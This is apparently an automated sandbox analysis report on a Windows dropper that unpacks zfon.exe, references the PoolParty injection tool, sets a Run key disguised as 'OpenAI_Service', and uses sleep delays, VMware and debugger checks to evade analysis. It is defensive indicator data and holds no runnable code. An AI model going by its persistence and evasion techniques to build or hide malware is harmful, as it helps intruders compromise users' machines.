Source: Binary string: d:\agent\_work\2\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: zfon.exe, 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000006.00000002.2624943938.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001A.00000002.2822975181.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001B.00000002.2822877853.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001C.00000002.2982816689.00007FF8A8052000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001D.00000002.2982816052.00007FF8A8052000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001E.00000002.3573056415.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001F.00000002.3573084819.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000022.00000002.4198997991.00007FF8B8342000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000023.00000002.4198930072.00007FF8B8342000.00000002.00000001.01000000.0000000C.sdmp, MSVCP140.dll.0.dr
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdb source: zfon.exe, 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2604339396.000002DC4BEC5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdbC source: zfon.exe, 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2604339396.000002DC4BEC5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\code\personal\soft_distribute_tags\code\CSharpInstaller13\obj\Release\counterstand.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: zfon.exe, 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000006.00000002.2627113916.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001A.00000002.2827027498.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001B.00000002.2827030579.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001C.00000002.2983306377.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001D.00000002.2983300322.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001E.00000002.3573963734.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001F.00000002.3573968038.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000022.00000002.4204868510.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000023.00000002.4202524795.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: q8EC:\buildworker\csgo_rel_win64\build\_build_\valve_wmf\_vpc_valve_wmf\default\win64\_msvc_\Retail\valve_wmf.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: zfon.exe, 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000006.00000002.2627113916.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001A.00000002.2827027498.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001B.00000002.2827030579.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001C.00000002.2983306377.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001D.00000002.2983300322.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001E.00000002.3573963734.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001F.00000002.3573968038.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000022.00000002.4204868510.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000023.00000002.4202524795.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: zfon.exe, 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000006.00000002.2626243469.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001A.00000002.2826630254.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001B.00000002.2826626774.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001C.00000002.2983575039.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001D.00000002.2983573004.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001E.00000002.3573610429.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001F.00000002.3573612962.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000022.00000002.4202113973.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000023.00000002.4200959181.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Unpacked PE file: 6.2.zfon.exe.7ff7f96e0000.0.unpack
Source: VJQyKuHEUe.exe, Static PE information: 0xD177A4E7 [Mon May 12 12:39:03 2081 UTC]
Source: VJQyKuHEUe.exe, Static PE information: real checksum: 0x32e39 should be: 0x388be
Source: zfon.exe.0.dr, Static PE information: real checksum: 0x0 should be: 0x293a39
Source: MSVCP140.dll.0.dr, Static PE information: section name: .didat
Source: VCRUNTIME140.dll.0.dr, Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr, Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Code function: 0_2_0275F0A2 pushad ; iretd 0_2_0275F0A9
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Code function: 6_2_000002DC4BE584DB push dword ptr [esp+eax-76h]; ret 6_2_000002DC4BE584E0
Source: C:\Windows\hh.exe, Code function: 7_2_000001CDCB5B00CF pushad ; iretd 7_2_000001CDCB5B00D0
Source: C:\Windows\hh.exe, Code function: 7_2_000001CDCB903D09 push eax; ret 7_2_000001CDCB903D0A
Source: C:\Windows\hh.exe, Code function: 7_2_000001CDCB903D26 push eax; ret 7_2_000001CDCB903D27
Source: C:\Windows\hh.exe, Code function: 7_2_000001CDCB903CA9 push eax; ret 7_2_000001CDCB903CAA
Source: C:\Windows\explorer.exe, Code function: 11_2_0305005B push esi; retf 11_2_030500AD
Source: C:\Windows\explorer.exe, Code function: 11_2_0305002D push esi; retf 11_2_030500AD
Source: C:\Windows\explorer.exe, Code function: 11_2_030500AE push esi; retf 11_2_030500AD
Source: C:\Windows\explorer.exe, Code function: 11_2_030500AE push esp; retf 11_2_030500B8
Source: C:\Windows\explorer.exe, Code function: 11_2_08925876 push ds; retf 11_2_08925877
Source: C:\Windows\explorer.exe, Code function: 11_2_08926172 push 8348FFFFh; ret 11_2_0892617A
Source: C:\Windows\explorer.exe, Code function: 11_2_089277A1 push ebx; iretd 11_2_089277A6

Persistence and Installation Behavior

Source: C:\Windows\hh.exe, File created: C:\ProgramData\kernelquick.sys
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, File created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\vcruntime140_1.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, File created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\MSVCP140.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, File created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\libcef.raw
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, File created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, File created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\VCRUNTIME140.dll
Source: C:\Windows\explorer.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OpenAI_Service
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B9116580 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00007FF8B9116580
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\hh.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE VenkernalData_info
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\hh.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47F4-A11E-851B338CEFB8}Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeMemory allocated: 28F0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeMemory allocated: 48F0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599657Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599532Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599422Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599313Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599188Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 599063Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598938Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598813Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598703Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598594Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598469Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598348Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598235Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598125Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 598013Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597907Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597782Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597657Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597532Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597407Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597282Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597157Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 597047Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596938Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596813Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596688Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596563Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596438Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596327Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596208Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 596052Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595938Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595813Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595703Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595594Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595484Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595368Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595220Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 595094Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594983Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594874Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594766Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594657Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594532Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594407Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594282Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeThread delayed: delay time: 594157Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeWindow / User API: threadDelayed 7297Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeWindow / User API: threadDelayed 2424Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 3385Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 2707Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 3289Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 745Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 704Jump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeDropped PE file which has not been started: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\libcef.rawJump to dropped file
Source: C:\Windows\hh.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeAPI coverage: 0.6 %
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeAPI coverage: 4.7 %
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeAPI coverage: 0.5 %
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -30437127721620741s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599875s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599657s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599532s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599422s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599313s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599188s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -599063s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598938s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598813s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598703s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598594s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598469s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598348s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598235s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598125s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -598013s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597907s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597782s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597657s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597532s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597407s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597282s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597157s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -597047s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596938s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596813s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596688s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596563s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596438s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596327s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596208s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -596052s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595938s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595813s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595703s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595594s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595484s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595368s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595220s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -595094s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594983s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594874s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594657s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594532s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594407s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594282s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe TID: 3304Thread sleep time: -594157s >= -30000sJump to behavior
Source: C:\Windows\hh.exe TID: 4416Thread sleep count: 3385 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 4416Thread sleep time: -3385000s >= -30000sJump to behavior
Source: C:\Windows\hh.exe TID: 516Thread sleep count: 2707 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 4416Thread sleep count: 3289 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 4416Thread sleep time: -3289000s >= -30000sJump to behavior
Source: C:\Windows\hh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90F0E70 FindFirstFileExW,FindClose,wcscpy_s,5_2_00007FF8B90F0E70
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8FF350 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,7_2_000001CDCB8FF350
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9360E70 FindFirstFileExW,FindClose,wcscpy_s,26_2_00007FF8A9360E70
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8010E70 FindFirstFileExW,FindClose,wcscpy_s,28_2_00007FF8A8010E70
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetLocalTime,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,7_2_000001CDCB8F6370
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Process queried: DebugPort
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 5_2_00007FF7F97A4EE0 GetLastError,IsDebuggerPresent,OutputDebugStringW,5_2_00007FF7F97A4EE0
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe; Process token adjusted: Debug
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 5_2_00007FF7F97A43EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7F97A43EC
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 5_2_00007FF8B912D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8B912D460
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 5_2_00007FF8BFAD4628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8BFAD4628
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 5_2_00007FF8BFB60AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8BFB60AD8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 26_2_00007FF7F97A43EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF7F97A43EC
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 26_2_00007FF8A939D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF8A939D460
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 26_2_00007FF8BFB84628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF8BFB84628
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 26_2_00007FF8BFBA0AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF8BFBA0AD8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 28_2_00007FF7F97A43EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF7F97A43EC
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 28_2_00007FF8A804D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8A804D460
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 28_2_00007FF8AF890AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8AF890AD8
